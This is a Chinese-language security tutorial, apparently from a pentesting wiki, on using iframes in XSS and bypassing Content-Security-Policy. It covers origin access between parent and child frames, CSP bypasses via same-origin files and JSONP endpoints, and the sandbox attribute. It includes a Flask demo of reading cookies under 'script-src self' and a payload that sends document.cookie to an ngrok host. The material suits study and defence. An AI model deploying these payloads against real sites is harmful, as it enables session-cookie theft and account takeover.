Iframes in XSS
有 3 种方式来指示 iframed 页面内容:
通过 src 指示一个 URL(该 URL 可以是跨源或同源)
访问父变量和子变量
Copy < html >
< script >
var secret = "31337s3cr37t" ;
</ script >
< iframe id = "if1" src = "http://127.0.1.1:8000/child.html" ></ iframe >
< iframe id = "if2" src = "child.html" ></ iframe >
< iframe id = "if3" srcdoc = "<script>var secret='if3 secret!'; alert(parent.secret)</script>" ></ iframe >
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
< script >
function access_children_vars (){
alert ( if1 .secret);
alert ( if2 .secret);
alert ( if3 .secret);
alert ( if4 .secret);
}
setTimeout (access_children_vars , 3000 );
</ script >
</ html >
Copy <!-- content of child.html -->
< script >
var secret = "child secret" ;
alert ( parent .secret)
</ script > 如果您通过 http 服务器访问之前的 html(如 python3 -m http.server),您会注意到所有脚本都会被执行(因为没有 CSP 阻止它)。父窗口无法访问任何 iframe 内部的 secret 变量 ,只有 if2 和 if3(被认为是同源的 iframe)可以访问原始窗口中的 secret 。
请注意 if4 被认为具有 null 来源。
带 CSP 的 Iframes
请注意,在以下绕过中,iframe 页面响应不包含任何阻止 JS 执行的 CSP 头。
script-src 的 self 值将不允许使用 data: 协议或 srcdoc 属性执行 JS 代码。
然而,即使 CSP 的 none 值也将允许执行在 src 属性中放置 URL(完整或仅路径)的 iframe。
因此,可以通过以下方式绕过页面的 CSP:
Copy < html >
< head >
< meta http-equiv = "Content-Security-Policy" content = "script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='" >
</ head >
< script >
var secret = "31337s3cr37t" ;
</ script >
< iframe id = "if1" src = "child.html" ></ iframe >
< iframe id = "if2" src = "http://127.0.1.1:8000/child.html" ></ iframe >
< iframe id = "if3" srcdoc = "<script>var secret='if3 secret!'; alert(parent.secret)</script>" ></ iframe >
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</ html > 注意,之前的 CSP 仅允许执行内联脚本 。
然而,只有 if1 和 if2 脚本将被执行,但只有 if1 能够访问父级秘密 。
因此,如果您可以将 JS 文件上传到服务器并通过 iframe 加载,即使 script-src 'none',也有可能绕过 CSP 。这也可能通过滥用同站 JSONP 端点来实现 。
您可以通过以下场景进行测试,即使在 script-src 'none' 的情况下也会窃取 cookie。只需运行应用程序并使用浏览器访问它:
Copy import flask
from flask import Flask
app = Flask ( __name__ )
@app . route ( "/" )
def index ():
resp = flask . Response ( '<html><iframe id="if1" src="cookie_s.html"></iframe></html>' )
resp . headers [ 'Content-Security-Policy' ] = "script-src 'self'"
resp . headers [ 'Set-Cookie' ] = 'secret=THISISMYSECRET'
return resp
@app . route ( "/cookie_s.html" )
def cookie_s ():
return "<script>alert(document.cookie)</script>"
if __name__ == "__main__" :
app . run () 在野外发现的其他有效载荷
Copy <!-- This one requires the data: scheme to be allowed -->
< iframe srcdoc = '<script src="data:text/javascript,alert(document.domain)"></script>' ></ iframe >
<!-- This one injects JS in a jsonp endppoint -->
<iframe srcdoc='<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
<!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe> Iframe sandbox
iframe 内的内容可以通过使用 sandbox 属性受到额外的限制。默认情况下,此属性不适用,这意味着没有限制。
当使用时,sandbox 属性施加了几个限制:
不允许通过 <embed>、<object>、<applet> 或类似标签使用插件。
自动触发的功能,如视频播放或表单控件的自动聚焦,被阻止。
属性的值可以留空(sandbox="")以应用上述所有限制。或者,可以设置为以空格分隔的特定值列表,以使 iframe 免于某些限制。
Copy < iframe src = "demo_iframe_sandbox.htm" sandbox ></ iframe > Iframes in SOP
检查以下页面:
Bypassing SOP with Iframes - 1 Bypassing SOP with Iframes - 2 Blocking main page to steal postmessage Steal postmessage modifying iframe location 
